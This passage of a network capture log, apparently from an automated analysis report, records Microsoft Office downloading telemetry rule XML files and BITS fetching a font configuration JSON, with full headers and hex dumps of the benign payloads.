                                                                                                                                      2024-10-07 01:23:19 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f 70 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeople" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      138192.168.2.44988913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:19 UTC192OUTGET /rules/rule703001v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:19 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:19 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1406
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                      ETag: "0x8DC582BEB16F27E"
                                                                                                                                      x-ms-request-id: 770fdf22-501e-0035-0d02-17c923000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012319Z-1657d5bbd48cpbzgkvtewk0wu000000002ug00000000kdxv
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:19 UTC1406INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 30 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 4d 61 63 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703001" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Mac.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      139192.168.2.449893184.28.90.27443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:19 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: identity
                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                      2024-10-07 01:23:20 UTC467INHTTP/1.1 200 OK
                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                      Server: ECAcc (lpl/EF45)
                                                                                                                                      X-CID: 11
                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                                      Cache-Control: public, max-age=228143
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:19 GMT
                                                                                                                                      Connection: close
                                                                                                                                      X-CID: 2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      140192.168.2.44989613.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:20 UTC192OUTGET /rules/rule700151v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1399
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                      ETag: "0x8DC582BE0A2434F"
                                                                                                                                      x-ms-request-id: 961c0255-701e-005c-1406-17bb94000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012320Z-1657d5bbd48sdh4cyzadbb374800000002q0000000006nnh
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:20 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOn


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      141192.168.2.44989413.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:20 UTC192OUTGET /rules/rule700750v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1377
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:02 GMT
                                                                                                                                      ETag: "0x8DC582BEAFF0125"
                                                                                                                                      x-ms-request-id: fba86ca6-e01e-00aa-5200-17ceda000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012320Z-1657d5bbd48qjg85buwfdynm5w00000002yg000000004myz
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:20 UTC1377INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 75 74 6c 6f 6f 6b 44 65 73 6b 74 6f 70 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Outlook.Desktop" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOutlookDesktop" S="Medium" />


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      142192.168.2.44989713.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:20 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1362
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                      ETag: "0x8DC582BE54CA33F"
                                                                                                                                      x-ms-request-id: 401481e1-301e-0099-6a5a-176683000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012320Z-1657d5bbd482krtfgrg72dfbtn00000002dg00000000txef
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:20 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      143192.168.2.44989813.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:20 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1372
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                      ETag: "0x8DC582BE6669CA7"
                                                                                                                                      x-ms-request-id: 9139889b-001e-0079-22f3-1612e8000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012320Z-1657d5bbd48762wn1qw4s5sd3000000002rg000000002wu0
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:20 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      144192.168.2.44989913.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:20 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:20 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:20 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1409
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                      ETag: "0x8DC582BDFC438CF"
                                                                                                                                      x-ms-request-id: 7cb43a82-e01e-0033-45fe-164695000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012320Z-1657d5bbd482lxwq1dp2t1zwkc00000002n0000000002hqa
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:20 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      145192.168.2.449900184.28.90.27443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:20 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: identity
                                                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                      Range: bytes=0-2147483646
                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                      2024-10-07 01:23:21 UTC515INHTTP/1.1 200 OK
                                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                      Server: ECAcc (lpl/EF06)
                                                                                                                                      X-CID: 11
                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                                      Cache-Control: public, max-age=228078
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:20 GMT
                                                                                                                                      Content-Length: 55
                                                                                                                                      Connection: close
                                                                                                                                      X-CID: 2
                                                                                                                                      2024-10-07 01:23:21 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      146192.168.2.46101213.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:21 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:21 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:21 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1371
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                                                                                                                      ETag: "0x8DC582BED3D048D"
                                                                                                                                      x-ms-request-id: d51e0a59-d01e-005a-6cfe-167fd9000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012321Z-1657d5bbd48xlwdx82gahegw4000000002wg00000000rkw5
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:21 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      147192.168.2.46101113.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:21 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-10-07 01:23:21 UTC563INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 07 Oct 2024 01:23:21 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1408
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                      ETag: "0x8DC582BE1038EF2"
                                                                                                                                      x-ms-request-id: 626a0b0f-301e-006e-6de9-16f018000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241007T012321Z-1657d5bbd48dfrdj7px744zp8s00000002eg00000000qv5y
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-10-07 01:23:21 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      148192.168.2.46101513.107.246.45443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-07 01:23:21 UTC192OUTGET /rules/rule702651v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
